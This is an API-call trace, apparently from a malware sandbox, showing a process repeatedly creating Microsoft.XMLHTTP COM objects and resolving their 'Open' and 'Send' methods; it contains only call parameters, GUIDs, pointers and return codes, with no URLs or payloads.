	[0306.769] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0306.769] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0306.769] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0306.769] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0306.769] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b98) returned 0x0
	[0306.769] ??2@YAPEAX_K@Z () returned 0x62f330
	[0306.769] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b98, pUnkSite=0x62f330) 
	[0306.769] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0306.769] XMLHTTPRequest:IUnknown:Release (This=0x49c5b98) returned 0x0
	[0306.769] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0306.769] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0306.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0306.770] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0306.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0306.772] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0306.772] SysStringLen (param_1=0x0) returned 0x0
	[0306.772] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0306.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0306.772] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0306.772] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0306.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c48) returned 0x0
	[0306.772] ??2@YAPEAX_K@Z () returned 0x62f310
	[0306.772] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c48, pUnkSite=0x62f310) 
	[0306.772] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0306.772] XMLHTTPRequest:IUnknown:Release (This=0x49c5c48) returned 0x0
	[0306.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0306.772] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
	[0306.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0306.772] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0306.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0306.773] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0306.773] SysStringLen (param_1=0x0) returned 0x0
	[0306.773] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0306.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0306.773] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0306.773] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0306.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74c8) returned 0x0
	[0306.773] ??2@YAPEAX_K@Z () returned 0x62f330
	[0306.773] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74c8, pUnkSite=0x62f330) 
	[0306.773] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0306.773] XMLHTTPRequest:IUnknown:Release (This=0x49c74c8) returned 0x0
	[0306.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0306.773] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0306.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0306.773] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0306.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0306.773] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0306.773] SysStringLen (param_1=0x0) returned 0x0
	[0306.773] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0306.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0306.774] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7510) returned 0x0
	[0306.774] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0306.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0306.774] ??2@YAPEAX_K@Z () returned 0x62f310
	[0306.774] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f310) 
	[0306.774] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0306.774] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0306.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7510) returned 0x0
	[0306.774] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7510) returned 0x3
	[0306.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0306.774] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7510, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0306.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0306.774] longjmp () 
	[0306.774] longjmp () 
	[0306.774] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0306.774] SysStringLen (param_1=0x0) returned 0x0
	[0306.774] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0306.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0306.775] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0306.775] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0306.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0306.775] ??2@YAPEAX_K@Z () returned 0x62f330
	[0306.775] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f330) 
	[0306.775] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0306.775] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0306.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0306.775] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0306.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0306.775] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0306.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0306.775] longjmp () 
	[0306.775] longjmp () 
	[0306.775] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0306.775] SysStringLen (param_1=0x0) returned 0x0
	[0306.775] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0306.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0306.776] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0306.776] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0306.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0306.776] ??2@YAPEAX_K@Z () returned 0x62f310
	[0306.776] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f310) 
	[0306.776] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0306.776] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0306.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0306.776] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0306.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0306.776] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0306.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0306.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0306.776] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0306.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0307.386] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
